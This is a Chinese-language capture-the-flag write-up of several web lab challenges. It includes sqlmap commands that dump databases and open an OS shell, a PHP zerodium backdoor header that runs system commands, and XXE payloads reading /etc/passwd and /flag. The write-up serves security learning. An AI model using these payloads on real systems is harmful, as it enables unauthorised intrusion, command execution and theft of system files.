1.文章管理系统

1）打开题目，把它页面翻完了，没看懂它有啥用

2）看了看源码，也是一样的，没找到有用的东西

3）想着可能还是在隐藏文件里找，那我就直接用dirsearch扫扫看

4）扫出来三个网址，其中一个有/?id=/etc/issue,估计它可能是跟内部数据库有关，于是想到用sqlmap跑跑看，sqlmap -u +网址/?id=1 --dbs --batch 

5)扫出来果然在里面找到文件，找了之后发现在word里面有文件，打开查看

sqlmap -u +网址/?id=1 -D word --tables --batch

6)接着打开表查看里面内容

sqlmap -u 网址/?id=1 -D word -T --dump --batch

7)结果真发现flag，但是提交后是错的

8）因为题目有提示说是需要命令执行才能拿到flag

这里用到命令

sqlmap -u 网址/？id=1 --os-shell

这也是根据它所给的提示来的

那就需要从其他方面下手，看了大佬的wp才知道这里用到shell

了解一下什么是shell？
shell是一个用 C 语言编写的程序，它是用户使用 Linux 的桥梁。Shell 既是一种命令语言，又是一种程序设计语言。

Shell 是指一种应用程序，这个应用程序提供了一个界面，用户通过这个界面访问操作系统内核的服务。

为什么要学习和使用shell？
Shell属于内置的脚本，程序开发的效率非常高，依赖于功能强大的命令可以迅速地完成开发任务（批处理）语法简单，代码写起来比较轻松，简单易学

注：--os-shell: 这是另一个选项，指示SQLMap在成功利用SQL注入漏洞后打开操作系统（OS）命令外壳（shell）。一旦SQLMap确定目标网站中存在SQL注入漏洞，并成功利用该漏洞获取了系统权限，它将在目标服务器上启动一个命令行外壳，使用户能够在目标系统上执行操作系统命令。

扫完后里面果然有文件输入命令ls打开具体文件

9）照着它一步步打开

10）看到flag，cat /flag打开，最终拿到flag

2.Robots

1）进入环境

2)看了看源码，啥也没有，直接进入Robots.txt,线索来了

3）直接把给的php文件打开flag就在里面，属实没想到它这莫简单

3.黑客终端

1）进入环境

2）一看源码，flag就在里面，过于抽象，被题目骗了

4.EasyMD5

1）打开环境，一开始我以为是基础的文件上传，但看着它两个上传地址就有点好奇了

2）我还是想着传两个木马上去看看，于是就出现下面这样

3)发现会提示不是 pdf格式的文件，还提示文件过大，最后提示你知道MD5碰撞吗？这里需要找两个MD5值相等的pdf文件上传才行。如下

4）上传成功后如下：它会快速闪出一下flag，需要截屏，再写下flag

5.PHP的后门

1）打开环境如下

2）查看源码没啥东西，开始以为是PHP伪协议或是文件包含之类的，但试了下发现都是报错

后面实在想不出来也是去看了其他大佬的wp才知道这里用到一个其他知识点

PHP zerodium后门漏洞，具体如下：

PHP zerodium后门漏洞-CSDN博客

3)然后直接抓包，添加代码执行

User-Agentt:zerodiumsystem("ls /");

4)然后看到有flag文件，再进行查看一下

User-Agentt:zerodiumsystem("cat /flag");

如此便能成功得到flag

5.PHP的XXE

1）打开题目，它有很多介绍，浅看一下，就当学点知识点

2）进来就是一个phpinfo界面，找了找flag，啥也没找到，后面弄了半天还是弄不出来

后面查了才知道这里需要访问simplexml_load_string.php文件，但是没有任何反应

3)那就尝试抓包试试，但是各种改，还是没思路，就去看了看大佬的wp

4)说是要尝试进行命令执行，把它加在后面，尝试运行

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>
<name>
&xxe;
</name>
 
</test>

5)发现访问成功，猜想flag文件在根目录下，然后再加下面的命令运行

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///flag">
]>
<test>
<name>
&xxe;
</name>
 
</test>

这里它涉及到simplexml_load_string.php命令

定义和用法
simplexml_load_string() 函数把 XML 字符串载入对象中。

如果失败，则返回 false。

语法
simplexml_load_file(string,class,options,ns,is_prefix)

返回值
返回类 SimpleXMLElement 的一个对象，该对象的属性包含 XML 文档中的数据。如果失败，则返回 false。